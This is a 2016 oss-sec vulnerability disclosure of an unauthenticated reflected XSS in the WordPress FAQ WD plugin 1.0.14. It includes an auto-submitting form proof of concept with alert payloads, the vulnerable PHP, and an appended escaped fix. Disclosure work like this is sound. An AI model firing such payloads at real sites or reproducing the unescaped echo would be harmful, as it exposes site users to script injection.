oss-sec mailing list archives
Unauthenticated XSS Vulnerability in WORDPRESS FAQ WD plugin 1.0.14.
From: shravan kumar <cor3sm4sh3r () gmail com>
Date: Sat, 16 Apr 2016 14:01:20 +0530
Hello,

I would like to report an unauthenticated XSS vulnerability in FAQ WD plugin version 1.0.14. The plugin can be found at https://wordpress.org/plugins/faq-wd/

This bug can be triggered by an unauthenticated / authenticated user. If a user is sent a URL by social engineering and the user clicks the link, the bug can be triggered. The URL should be something like this:

http://attackerssite.com/XSS_POC.html

The code for XSS_POC.html is as follows:

<html>
<body onload="document.forms['xss'].submit()">
<form name="xss" action="http://targetsite/wpinstallation/wp-content/plugins/faq-wd/lang/views/SLangViewPo.php" method="POST">
<input type="hidden" name="lang_err_mess" value="<script>alert(1);</script>" />
<input type="hidden" name="lang_success_synchron" value="<script>alert(2);</script>" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

Technical Details:

The vulnerable page is wp-content/plugins/faq-wd/lang/views/SLangViewPo.php. This page can be directly accessed by anyone.

The code responsible for the vulnerability:

<?php if (isset($_POST['lang_err_mess'])): ?>
<div class="error" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_err_mess']; ?></p></div>
<?php elseif (isset($_POST['lang_success'])): ?>
<div class="updated" style="display: inline-block;width: 100%"><p><?php echo 'File was successfully updated.'; ?></p></div>
<?php endif; ?>

<?php if (isset($_POST['lang_success_synchron'])): ?>
<div class="updated" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_success_synchron']; ?></p></div>
<?php endif; ?>

Here we can see that there are two POST requests which are displayed in an unsafe manner while rendering the page.

The vulnerable POST parameters are:
- $_POST['lang_err_mess']
- $_POST['lang_success_synchron']

--
Shravan Kumar
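The same view with the two reflected values escaped before output, as an added example that is neither the plugin's code nor part of the report above. It assumes the file is loaded from inside WordPress (so ABSPATH, esc_html(), current_user_can() and check_admin_referer() are available); the capability and nonce checks are an assumed hardening the report does not describe, and the nonce names are constructed placeholders.

```php
<?php
// Added example, not the plugin's or the reporter's code: the view from the
// report with the reflected values escaped. Assumes WordPress is loaded.

// A request for the PHP file itself never runs the WordPress bootstrap, so this
// standard guard stops the "directly accessed by anyone" case with a blank page.
defined('ABSPATH') || exit;

// Only an administrator should reach an admin-side language view, and a nonce
// ties the POST to a form WordPress itself rendered, so a victim's cross-site
// auto-submitted form is rejected before any value is echoed.
if (!current_user_can('manage_options')) {
    wp_die('Insufficient permissions.');
}
if (!empty($_POST)) {
    // Action and field names are placeholders, not the plugin's real names.
    check_admin_referer('faqwd_lang_view', 'faqwd_lang_nonce');
}

/**
 * Escape a message for use inside HTML text content. With this applied,
 * "<script>alert(1);</script>" reaches the browser as literal text, not markup.
 */
function faqwd_safe_message($raw) {
    return esc_html((string) $raw);
}
?>
<?php if (isset($_POST['lang_err_mess'])): ?>
<div class="error" style="display: inline-block;width: 100%"><p><?php echo faqwd_safe_message($_POST['lang_err_mess']); ?></p></div>
<?php elseif (isset($_POST['lang_success'])): ?>
<div class="updated" style="display: inline-block;width: 100%"><p><?php echo 'File was successfully updated.'; ?></p></div>
<?php endif; ?>

<?php if (isset($_POST['lang_success_synchron'])): ?>
<div class="updated" style="display: inline-block;width: 100%"><p><?php echo faqwd_safe_message($_POST['lang_success_synchron']); ?></p></div>
<?php endif; ?>
```

Outside WordPress, htmlspecialchars($raw, ENT_QUOTES | ENT_HTML5, 'UTF-8') gives the same text-context escaping as esc_html().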